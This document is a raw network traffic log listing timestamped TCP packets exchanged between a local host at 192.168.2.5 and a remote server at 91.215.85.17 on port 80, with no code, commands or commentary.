Oct 13, 2023 15:20:52.490041018 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.490065098 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.490094900 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.490133047 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.490309000 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.490427971 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.490504026 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.490519047 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.490556002 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.490571976 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.490624905 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.490659952 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.490715981 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.490731001 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.490782976 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.490798950 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.490868092 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.490902901 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.490959883 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.491071939 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.491091967 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.491126060 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.491143942 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.491162062 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.491194010 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.491231918 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.491298914 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.491348028 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.491354942 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.491386890 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.491401911 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.491467953 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.491509914 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.491559029 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.491581917 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.491627932 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.491688013 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.491780996 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.491852999 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.491888046 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.491909027 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.491924047 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.491935968 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.491991997 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.492028952 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.492080927 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.492137909 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.492192984 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.492245913 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.492285013 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.492335081 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.492379904 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.492403030 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.492451906 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.492486954 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.492567062 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.492635012 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.492683887 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.492685080 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.492733955 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.492736101 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.492815018 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.492886066 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.492922068 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.492943048 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.492959023 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.492973089 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.493029118 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.493220091 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.493277073 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.493324041 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.493371964 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.493381023 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.493451118 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.493520021 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.493557930 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.493581057 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.493607998 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.493633032 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.493702888 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.493771076 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.493822098 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.493830919 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.493881941 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.493900061 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.494009018 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.494066000 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.494067907 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.494102001 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.494152069 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.494210958 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.494313955 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.494349957 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.494407892 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.494419098 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.494468927 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.494473934 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.494510889 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.494569063 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.494618893 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.494638920 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.494673967 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.494683981 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.494744062 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.494780064 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.494837046 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.494875908 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.494925976 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.495013952 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.495098114 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.495135069 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.495187044 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.495228052 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.495279074 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.495296955 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.495404005 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.495440006 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.495476007 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.495497942 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.495528936 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.495558023 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.495594025 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.495666027 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.495723963 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.495785952 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.495822906 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.495836020 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.495891094 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.495943069 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.495995998 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.496009111 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.496047020 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.496059895 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.496198893 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.496236086 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.496289968 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.496310949 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.496362925 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.496378899 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.496507883 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.496589899 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.496649981 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.496680021 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.496716976 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.496731043 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.496788025 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.496828079 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.496872902 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.496881008 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.496916056 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.496923923 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.496953011 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.502758026 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.846781015 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.900129080 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:53.578294039 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:53.815511942 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:53.815623999 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.167350054 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.183373928 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.187743902 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.187824965 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.540240049 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.559333086 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.559382915 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.559420109 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.559456110 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.559484005 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.559498072 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.559559107 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.559606075 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.559644938 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.559648991 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.559686899 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.559726000 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.559743881 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.559863091 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.559901953 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.559933901 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.559937954 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.559999943 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.560009956 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.560113907 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.560170889 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.560180902 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.560218096 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.560252905 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.560269117 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.560291052 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.560343981 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.560393095 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.560429096 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.560481071 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.560520887 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.560556889 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.560605049 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.560623884 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.560659885 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.560714960 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.560731888 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.560858011 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.560910940 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.560964108 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.561001062 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.561062098 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.561105967 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.561178923 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.561234951 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.561235905 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.561319113 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.561367035 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.561383963 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.561463118 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.561511993 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.561526060 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.561606884 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.561655045 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.561655998 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.561748028 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.561790943 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.561795950 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.561889887 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.561908007 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.561928034 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.561940908 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.561979055 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.561995983 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.562063932 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.562079906 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.562114954 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.562169075 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.562223911 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.562254906 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.562352896 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.562370062 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.562414885 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.562455893 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.562505007 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.562586069 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.562659979 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.562711000 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.562725067 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.562764883 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.562784910 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.562820911 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.562858105 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.562913895 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.562932968 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.562985897 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.563039064 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.563051939 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.563133001 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.563184977 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.563185930 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.563241959 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.563297033 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.563313961 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.563405991 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.563460112 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.563461065 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.563500881 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.563549995 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.563584089 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.563646078 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.563699007 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.563700914 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.563736916 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.563791037 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.563813925 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.563879967 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.563926935 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.563946962 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.564023018 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.564080000 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.564110041 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.564163923 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.564214945 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.564233065 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.564297915 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.564313889 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.564352036 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.564390898 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.564445019 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.564454079 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.564523935 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.564579010 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.564580917 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.564615011 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.564660072 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.564691067 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.564747095 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.564793110 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.564799070 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.564851999 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.564894915 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.564905882 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.564958096 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.565016031 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.565053940 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.565143108 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.565190077 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.565211058 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.565246105 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.565294027 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.565351963 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.565371990 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.565409899 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.565426111 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.565464020 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.565551996 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.565557957 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.565644979 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.565709114 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.565723896 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.565857887 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.565917015 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.911917925 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.911984921 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.912023067 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.912060976 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.912067890 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.912102938 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.912134886 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.912144899 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.912185907 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.912195921 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.912225962 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.912277937 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.912354946 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.912394047 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.912431955 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.912450075 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.912502050 CEST	80	49721	91.215.85.17	192.168.2.5
